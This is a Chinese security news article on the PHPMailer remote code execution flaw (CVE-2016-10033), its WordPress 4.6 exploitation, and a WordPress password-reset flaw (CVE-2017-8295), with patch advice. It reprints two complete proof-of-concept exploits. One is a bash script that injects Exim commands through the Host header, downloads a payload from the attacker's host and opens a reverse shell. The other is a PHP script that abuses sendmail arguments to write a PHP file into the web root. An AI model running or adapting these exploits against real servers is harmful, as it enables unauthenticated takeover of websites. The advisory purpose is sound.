【更新WordPress 4.6漏洞利用PoC】PHPMailer曝远程代码执行高危漏洞（CVE-2016-10033）

【2017.5.4更新】

昨天曝出了两个比较热门的漏洞，一个是CVE-2016-10033，另一个则为CVE-2017-8295。从描述来看，前者是WordPress Core 4.6一个未经授权的RCE漏洞。不过实际上，这就是去年12月份FreeBuf已经报道的漏洞，因此我们在原文基础上进行更新。

这次漏洞公告就是PHPMailer漏洞利用细节在WordPress核心中的实现。未经授权的攻击者利用漏洞就能实现远程代码执行，针对目标服务器实现即时访问，最终导致目标应用服务器的完全陷落。无需插件或者非标准设置，就能利用该漏洞。实际上Wordfence当时就曾经提到过该漏洞影响到了WP Core。

最新的这则公告提到了PHP mail()函数的新利用向量，可在MTA – Exim4之上利用该漏洞，Exim在如Debian或Ubuntu等系统中都是默认安装的。这样一来也就增加了此类攻击的范围和漏洞的严重性。具体为利用host字段注入了恶意数据，进入到了mail函数，再利用sendmail (实际上是软连接到的exim4)命令的-be 参数来执行命令。

之所以到现在才公布这部分细节，是期望给予WordPress和其它收到影响的软件提供商更多时间来升级受影响的Mail库。除此之外，也是针对CVE-2017-8295漏洞留出更多的修复时间。

漏洞利用详情参见：https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html

---

影响范围：

本次公告中提到的RCE PoC基于WordPress 4.6实现，不过其它版本的WordPress也可能受到影响。

视频演示PoC：https://www.youtube.com/watch?v=ZFt_S5pQPX0

作者给出的PoC：

 #!/bin/bash
 #
 
 # __ __ __ __ __
 
 # / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________
 
 # / / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
 
 # / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ )
 
 # /_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/
 
 # /____/
 
 #
 
 #
 
 # WordPress 4.6 - Remote Code Execution (RCE) PoC Exploit
 
 # CVE-2016-10033
 
 #
 
 # wordpress-rce-exploit.sh (ver. 1.0)
 
 #
 
 #
 
 # Discovered and coded by
 
 #
 
 # Dawid Golunski (@dawid_golunski)
 
 # https://legalhackers.com
 
 #
 
 # ExploitBox project:
 
 # https://ExploitBox.io
 
 #
 
 # Full advisory URL:
 
 # https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
 
 #
 
 # Exploit src URL:
 
 # https://exploitbox.io/exploit/wordpress-rce-exploit.sh
 
 #
 
 #
 
 # Tested on WordPress 4.6:
 
 # https://github.com/WordPress/WordPress/archive/4.6.zip
 
 #
 
 # Usage:
 
 # ./wordpress-rce-exploit.sh target-wordpress-url
 
 #
 
 #
 
 # Disclaimer:
 
 # For testing purposes only
 
 #
 
 #
 
 # -----------------------------------------------------------------
 
 #
 
 # Interested in vulns/exploitation?
 
 #
 
 #
 
 # .;lc'
 
 # .,cdkkOOOko;.
 
 # .,lxxkkkkOOOO000Ol'
 
 # .':oxxxxxkkkkOOOO0000KK0x:'
 
 # .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.
 
 # ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl.
 
 # '';ldxxxxxdc,. ,oOXXXNNNXd;,.
 
 # .ddc;,,:c;. ,c: .cxxc:;:ox:
 
 # .dxxxxo, ., ,kMMM0:. ., .lxxxxx:
 
 # .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx:
 
 # .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx:
 
 # .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx:
 
 # .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx:
 
 # .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx:
 
 # .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx:
 
 # .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx:
 
 # .dxxxxxdl;. ., .. .;cdxxxxxx:
 
 # .dxxxxxxxxxdc,. 'cdkkxxxxxxxx:
 
 # .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,.
 
 # .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.
 
 # .':oxxxxxxxxx.ckkkkkkkkxl,.
 
 # .,cdxxxxx.ckkkkkxc.
 
 # .':odx.ckxl,.
 
 # .,.'.
 
 #
 
 # https://ExploitBox.io
 
 #
 
 # https://twitter.com/Exploit_Box
 
 #
 
 # -----------------------------------------------------------------
 
 rev_host="192.168.57.1"
 
 function prep_host_header() {
 
 cmd="$1"
 
 rce_cmd="\${run{$cmd}}";
 
 # replace / with ${substr{0}{1}{$spool_directory}}
 
 #sed 's^/^${substr{0}{1}{$spool_directory}}^g'
 
 rce_cmd="`echo $rce_cmd | sed 's^/^\${substr{0}{1}{\$spool_directory}}^g'`"
 
 # replace ' ' (space) with
 
 #sed 's^ ^${substr{10}{1}{$tod_log}}$^g'
 
 rce_cmd="`echo $rce_cmd | sed 's^ ^\${substr{10}{1}{\$tod_log}}^g'`"
 
 #return "target(any -froot@localhost -be $rce_cmd null)"
 
 host_header="target(any -froot@localhost -be $rce_cmd null)"
 
 return 0
 
 }
 
 #cat exploitbox.ans
 
 intro="
 
 DQobWzBtIBtbMjFDG1sxOzM0bSAgICAuO2xjJw0KG1swbSAbWzIxQxtbMTszNG0uLGNka2tPT09r
 
 bzsuDQobWzBtICAgX19fX19fXxtbOEMbWzE7MzRtLiwgG1swbV9fX19fX19fG1s1Q19fX19fX19f
 
 G1s2Q19fX19fX18NCiAgIFwgIF9fXy9fIF9fX18gG1sxOzM0bScbWzBtX19fXBtbNkMvX19fX19c
 
 G1s2Q19fX19fX19cXyAgIF8vXw0KICAgLyAgXy8gICBcXCAgIFwvICAgLyAgIF9fLxtbNUMvLyAg
 
 IHwgIFxfX19fXy8vG1s3Q1wNCiAgL19fX19fX19fXz4+G1s2QzwgX18vICAvICAgIC8tXCBfX19f
 
 IC8bWzVDXCBfX19fX19fLw0KIBtbMTFDPF9fXy9cX19fPiAgICAvX19fX19fX18vICAgIC9fX19f
 
 X19fPg0KIBtbNkMbWzE7MzRtLmRkYzssLDpjOy4bWzlDG1swbSxjOhtbOUMbWzM0bS5jeHhjOjs6
 
 b3g6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eG8sG1s1QxtbMG0uLCAgICxrTU1NMDouICAuLBtb
 
 NUMbWzM0bS5seHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1QxtbMG1sVy4gb01N
 
 TU1NTU1LICBkMBtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1
 
 QxtbMG0uMGsuLEtXTU1NV05vIDpYOhtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDLhtbMTsz
 
 NG1keHh4eHhjG1s2QxtbMG0ueE4weHh4eHh4eGtYSywbWzZDG1szNG0ueHh4eHh4Og0KG1szN20g
 
 G1s2Qy4bWzE7MzRtZHh4eHh4YyAgICAbWzBtbGRkT01NTU1XZDBNTU1NS2RkZC4gICAbWzM0bS54
 
 eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s2QxtbMG0uY05NTU1OLm9NTU1NeCcb
 
 WzZDG1szNG0ueHh4eHh4Og0KG1szN20gG1s2QxtbMTszNG0uZHh4eHh4YxtbNUMbWzBtbEtvO2RO
 
 TU4ub01NMDs6T2suICAgIBtbMzRtJ3h4eHh4eDoNChtbMzdtIBtbNkMbWzE7MzRtLmR4eHh4eGMg
 
 ICAgG1swbTtNYyAgIC5seC46bywgICAgS2wgICAgG1szNG0neHh4eHh4Og0KG1szN20gG1s2Qxtb
 
 MTszNG0uZHh4eHh4ZGw7LiAuLBtbMTVDG1swOzM0bS4uIC47Y2R4eHh4eHg6DQobWzM3bSAbWzZD
 
 G1sxOzM0bS5keHh4eCAbWzBtX19fX19fX18bWzEwQ19fX18gIF9fX19fIBtbMzRteHh4eHg6DQob
 
 WzM3bSAbWzdDG1sxOzM0bS4nOm94IBtbMG1cG1s2Qy9fIF9fX19fX19fXCAgIFwvICAgIC8gG1sz
 
 NG14eGMsLg0KG1szN20gG1sxMUMbWzE7MzRtLiAbWzBtLxtbNUMvICBcXBtbOEM+G1s3QzwgIBtb
 
 MzRteCwNChtbMzdtIBtbMTJDLxtbMTBDLyAgIHwgICAvICAgL1wgICAgXA0KIBtbMTJDXF9fX19f
 
 X19fXzxfX19fX19fPF9fX18+IFxfX19fPg0KIBtbMjFDG1sxOzM0bS4nOm9keC4bWzA7MzRtY2t4
 
 bCwuDQobWzM3bSAbWzI1QxtbMTszNG0uLC4bWzA7MzRtJy4NChtbMzdtIA0K"
 
 intro2="
 
 ICAgICAgICAgICAgICAgICAgIBtbNDRtfCBFeHBsb2l0Qm94LmlvIHwbWzBtCgobWzk0bSsgLS09
 
 fBtbMG0gG1s5MW1Xb3JkcHJlc3MgQ29yZSAtIFVuYXV0aGVudGljYXRlZCBSQ0UgRXhwbG9pdBtb
 
 MG0gIBtbOTRtfBtbMG0KG1s5NG0rIC0tPXwbWzBtICAgICAgICAgICAgICAgICAgICAgICAgICAg
 
 ICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBtChtbOTRtKyAtLT18G1swbSAgICAgICAgICBE
 
 aXNjb3ZlcmVkICYgQ29kZWQgQnkgICAgICAgICAgICAgICAgG1s5NG18G1swbQobWzk0bSsgLS09
 
 fBtbMG0gICAgICAgICAgICAgICAbWzk0bURhd2lkIEdvbHVuc2tpG1swbSAgICAgICAgICAgICAg
 
 ICAgIBtbOTRtfBtbMG0gChtbOTRtKyAtLT18G1swbSAgICAgICAgIBtbOTRtaHR0cHM6Ly9sZWdh
 
 bGhhY2tlcnMuY29tG1swbSAgICAgICAgICAgICAgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBt
 
 ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBt
 
 ChtbOTRtKyAtLT18G1swbSAiV2l0aCBHcmVhdCBQb3dlciBDb21lcyBHcmVhdCBSZXNwb25zaWJp
 
 bGl0eSIgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBtICAgICAgICAqIEZvciB0ZXN0aW5nIHB1
 
 cnBvc2VzIG9ubHkgKiAgICAgICAgICAbWzk0bXwbWzBtIAoKCg=="
 
 echo "$intro" | base64 -d
 
 echo "$intro2" | base64 -d
 
 if [ "$#" -ne 1 ]; then
 
 echo -e "Usage:\n$0 target-wordpress-url\n"
 
 exit 1
 
 fi
 
 target="$1"
 
 echo -ne "\e[91m[*]\033[0m"
 
 read -p " Sure you want to get a shell on the target '$target' ? [y/N] " choice
 
 echo
 
 if [ "$choice" == "y" ]; then
 
 echo -e "\e[92m[*]\033[0m Guess I can't argue with that... Let's get started...\n"
 
 echo -e "\e[92m[+]\033[0m Connected to the target"
 
 # Serve payload/bash script on :80
 
 RCE_exec_cmd="(sleep 3s && nohup bash -i >/dev/tcp/$rev_host/1337 0<&1 2>&1) &"
 
 echo "$RCE_exec_cmd" > rce.txt
 
 python -mSimpleHTTPServer 80 2>/dev/null >&2 &
 
 hpid=$!
 
 # Save payload on the target in /tmp/rce
 
 cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
 
 prep_host_header "$cmd"
 
 curl -H"Host: $host_header" -s -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword
 
 echo -e "\n\e[92m[+]\e[0m Payload sent successfully"
 
 # Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce
 
 cmd="/bin/bash /tmp/rce"
 
 prep_host_header "$cmd"
 
 curl -H"Host: $host_header" -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword &
 
 echo -e "\n\e[92m[+]\033[0m Payload executed!"
 
 echo -e "\n\e[92m[*]\033[0m Waiting for the target to send us a \e[94mreverse shell\e[0m...\n"
 
 nc -vv -l 1337
 
 echo
 
 else
 
 echo -e "\e[92m[+]\033[0m Responsible choice ;) Exiting.\n"
 
 exit 0
 
 fi
 
 echo "Exiting..."
 
 exit 0

上述另外一个最新曝出编号为CVE-2017-8295的漏洞，严重程度被评级为介于Medium和High之间（而非Critical），影响到WordPress Core <= 4.7.4以下的版本。

这个漏洞的概况是这样的：WordPress有个密码重置功能，该特性中存在漏洞——在某些情况下可能导致攻击者在无需身份认证的情况下拿到密码重置链接，这样一来攻击者就能获取目标用户的WordPress账户了。

这个漏洞源于WordPress默认在创建密码重置邮件的时候，采用不受信任的数据。具体的利用方式点击这里查看。目前WordPress官方暂无针对该问题的解决方案，可以采用如下临时解决方案：

用户可启用UserCanonicalName实施静态SERVER_NAME值

https://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname

据作者所说，该问题已经向WordPress安全团队进行过多次反馈，最早一次是在去年7月份，但一直没有得到相应的反馈。

【2016.12.27原文】

这次曝出远程代码执行漏洞的是堪称全球最流行邮件发送类的PHPMailer，据说其全球范围内的用户量大约有900万——每天还在持续增多。

GitHub上面形容PHPMailer“可能是全球PHP发送邮件最流行的代码。亦被诸多开源项目所采用，包括WordPress、Drupal、1CRM、Joomla!等”。所以这个漏洞影响范围还是比较广的，漏洞级别也为Critical最高级。

漏洞编码

CVE-2016-10033

影响版本

PHPMailer <  5.2.18

漏洞级别

高危

漏洞描述

独立研究人员Dawid Golunski发现了该漏洞——远程攻击者利用该漏洞，可实现远程任意代码在web服务器账户环境中执行，并使web应用陷入威胁中。攻击者主要在常见的web表单如意见反馈表单，注册表单，邮件密码重置表单等使用邮件发送的组件时利用此漏洞。

不过有关该漏洞的细节信息，研究人员并未披露，期望给予网站管理员更多的时间来升级PHPMailer类，避免受漏洞影响。

漏洞PoC

实际上Dawid Golunski已经做了个可行的RCE PoC，不过会迟一些再发布。关注视频PoC请点击：https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html

更新：PoC代码已经公布，请站长们尽快升级！

 <?php
 /*
 PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)
 A simple PoC (working on Sendmail MTA)
 It will inject the following parameters to sendmail command:
 Arg no. 0 == [/usr/sbin/sendmail]
 Arg no. 1 == [-t]
 Arg no. 2 == [-i]
 Arg no. 3 == [-fattacker\]
 Arg no. 4 == [-oQ/tmp/]
 Arg no. 5 == [-X/var/www/cache/phpcode.php]
 Arg no. 6 == [some"@email.com]
 which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
 The resulting file will contain the payload passed in the body of the msg:
 09607 <<< --b1_cb4566aa51be9f090d9419163e492306
 09607 <<< Content-Type: text/html; charset=us-ascii
 09607 <<<
 09607 <<< <?php phpinfo(); ?>
 09607 <<<
 09607 <<<
 09607 <<<
 09607 <<< --b1_cb4566aa51be9f090d9419163e492306--
 See the full advisory URL for details.
 */
 // Attacker's input coming from untrusted source such as $_GET , $_POST etc.
 // For example from a Contact form
 $email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com';
 $msg_body  = "<?php phpinfo(); ?>";
 // ------------------
 // mail() param injection via the vulnerability in PHPMailer
 require_once('class.phpmailer.php');
 $mail = new PHPMailer(); // defaults to using php "mail()"
 $mail->SetFrom($email_from, 'Client Name');
 $address = "customer_feedback@company-X.com";
 $mail->AddAddress($address, "Some User");
 $mail->Subject    = "PHPMailer PoC Exploit CVE-2016-10033";
 $mail->MsgHTML($msg_body);
 if(!$mail->Send()) {
 echo "Mailer Error: " . $mail->ErrorInfo;
 } else {
 echo "Message sent!\n";
 } 

漏洞修复

更新到5.2.18：https://github.com/PHPMailer/PHPMailer

漏洞详情目前已经提交给了PHPMailer官方——官方也已经发布了PHPMailer 5.2.18紧急安全修复，解决上述问题，受影响的用户应当立即升级。详情可参见：

https://github.com/PHPMailer/PHPMailer/blob/master/changelog.md

https://github.com/PHPMailer/PHPMailer/blob/master/SECURITY.md

*本文投稿作者：lmj，转载须注明来自FreeBuf.COM